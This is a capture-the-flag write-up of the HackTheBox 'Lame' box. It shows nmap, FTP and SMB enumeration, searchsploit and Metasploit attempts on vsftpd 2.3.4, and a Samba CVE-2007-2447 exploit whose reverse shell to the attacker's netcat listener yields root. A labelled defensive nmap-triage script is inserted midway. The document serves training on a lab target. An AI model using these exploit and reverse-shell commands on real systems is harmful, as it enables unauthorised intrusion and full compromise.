Lame

Details:

  • OS: Linux
  • RELEASE DATE: 14 Mar 2017
  • DIFFICULTY: Easy

Enumeration:

export host variables
export RHOST=10.129.229.88
export LHOST=10.10.14.113
nmap target scan
> nmap -sS -sV -sC -p- -oN Lame $RHOST
...
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-07 13:24 BST
Nmap scan report for 10.129.232.239
Host is up (0.0087s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.113
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2024-06-07T08:27:48-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 2h00m38s, deviation: 2h49m45s, median: 36s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.27 seconds

Exploitation:

test anonymous ftp login

ncftp
> ncftp -u anonymous $RHOST
...
Connecting to 10.129.232.239...
(vsFTPd 2.3.4)
Logging in...
Login successful.
Logged in to 10.129.232.239.
ncftp / >

# check dir
ncftp / > ls -lha
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..

nothing to see…


list the public shares on the server

smbclient
> smbclient -L $RHOST -U%
...
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME

get share details

smbmap
> smbmap -H $RHOST
...
[+] IP: 10.129.232.239:445	Name: hackthebox.gr                                     
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	tmp                                               	READ, WRITE	oh noes!
	opt                                               	NO ACCESS	
	IPC$                                              	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$                                            	NO ACCESS	IPC Service (lame server (Samba 3.0.20-Debian))

test anonymous smb login again, but this time directly against the tmp share where we have read/write permissions

smbclient
> smbclient -N //$RHOST/tmp
...
Anonymous login successful
smb: \> ls
...
  .                                   D        0  Fri Jun  7 14:18:44 2024
  ..                                 DR        0  Sat Oct 31 06:33:58 2020
  .ICE-unix                          DH        0  Fri Jun  7 13:20:42 2024
  vmware-root                        DR        0  Fri Jun  7 13:20:51 2024
  .X11-unix                          DH        0  Fri Jun  7 13:21:09 2024
  .X0-lock                           HR       11  Fri Jun  7 13:21:09 2024
  5657.jsvc_up                        R        0  Fri Jun  7 13:21:54 2024
  vgauthsvclog.txt.0                  R     1600  Fri Jun  7 13:20:41 2024

		7282168 blocks of size 1024. 5385892 blocks available

nothing to see…


look up known exploits for the remaining service versions:

searchsploit vsftp
> searchsploit vsFTPd 2.3.4
...
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                    | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                       | unix/remote/17491.rb
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit openssh
> searchsploit OpenSSH 4.7p1
...
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                     | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                               | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                 | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                       | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Es | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                     | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                         | linux/remote/45939.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
searchsploit samba
> searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                               |  Path
--------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                       | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)             | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                        | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
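As an added defender-side example (not part of the original writeup): a small triage script that parses nmap -oN output like the scan above and flags the version strings and weak settings that this writeup goes on to follow up (vsftpd 2.3.4 / CVE-2011-2523, Samba 3.0.20 / CVE-2007-2447, anonymous FTP, SMB signing disabled). The sample input is constructed from a few lines of the scan above, and the remediation notes are the example's own, not nmap's.

```python
import re

# Constructed sample in the shape of the nmap -oN output above (trimmed to a few lines).
SAMPLE_NMAP = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
|_  message_signing: disabled (dangerous, but default)
"""

# One port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# Version substrings and the advisories this writeup ties them to.
KNOWN_BAD = [
    ("vsftpd 2.3.4", "CVE-2011-2523 backdoored release; upgrade vsftpd"),
    ("Samba smbd 3.0.20", "CVE-2007-2447 'username map script' RCE; upgrade Samba"),
]
# NSE output fragments that signal a weak setting rather than a bad version.
WEAK_CONFIG = [
    ("Anonymous FTP login allowed", "anonymous FTP enabled; disable unless required"),
    ("message_signing: disabled", "SMB signing off; set 'server signing = mandatory'"),
]

def parse_ports(text):
    """Return one dict per port line found in nmap -oN style output."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({"port": int(m.group(1)), "proto": m.group(2),
                          "state": m.group(3), "service": m.group(4),
                          "version": m.group(5).strip()})
    return ports

def triage(text):
    """Return (port, matched_text, note) tuples worth following up on."""
    findings = []
    for p in parse_ports(text):
        for needle, note in KNOWN_BAD:
            if needle in p["version"]:
                findings.append((p["port"], needle, note))
    for line in text.splitlines():  # NSE lines carry no port of their own
        for needle, note in WEAK_CONFIG:
            if needle in line:
                findings.append((None, needle, note))
    return findings
```

Running `triage(open("Lame").read())` on the saved -oN file from the scan above yields the same four findings the searchsploit lookups and the smb-security-mode output point at.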

test the manual exploit

searchsploit
# load module
> searchsploit -m unix/remote/49757.py
...
  Exploit: vsftpd 2.3.4 - Backdoor Command Execution
      URL: https://www.exploit-db.com/exploits/49757
     Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
    Codes: CVE-2011-2523
 Verified: True
File Type: Python script, ASCII text executable
Copied to: /root/49757.py

# run script
> python /root/49757.py $RHOST
...
# ...gets stuck
^C   [+]Exiting...

switch to metasploit

msfconsole
# search for module
[msf](Jobs:0 Agents:0) >> search vsftpd

Matching Modules
================
   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  No     VSFTPD v2.3.4 Backdoor Command Execution

Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

# load module
[msf](Jobs:0 Agents:0) >> use exploit/unix/ftp/vsftpd_234_backdoor

# print options
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> options

# set rhost
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set rhost <ip_address>

# set payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> set payload cmd/unix/interact

# run payload
[msf](Jobs:0 Agents:0) exploit(unix/ftp/vsftpd_234_backdoor) >> run
...
[*] 10.129.232.239:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.232.239:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

does not look so good


Let's try the command injection vulnerability CVE-2007-2447 using amriunix/CVE-2007-2447

# clone repo
> git clone https://github.com/amriunix/CVE-2007-2447

# install dependencies
> pip3 install --user pysmb

# run netcat in a different terminal
> nc -lnvp 5555
...
Ncat: Listening on 0.0.0.0:5555

# run script
> python3 ./CVE-2007-2447/usermap_script.py $RHOST 139 $LHOST 5555

# on netcat you will see
Ncat: Connection from 10.129.232.239.

# in netcat check
> whoami
...
root #(!)

Conclusion:

simple in retrospect, as always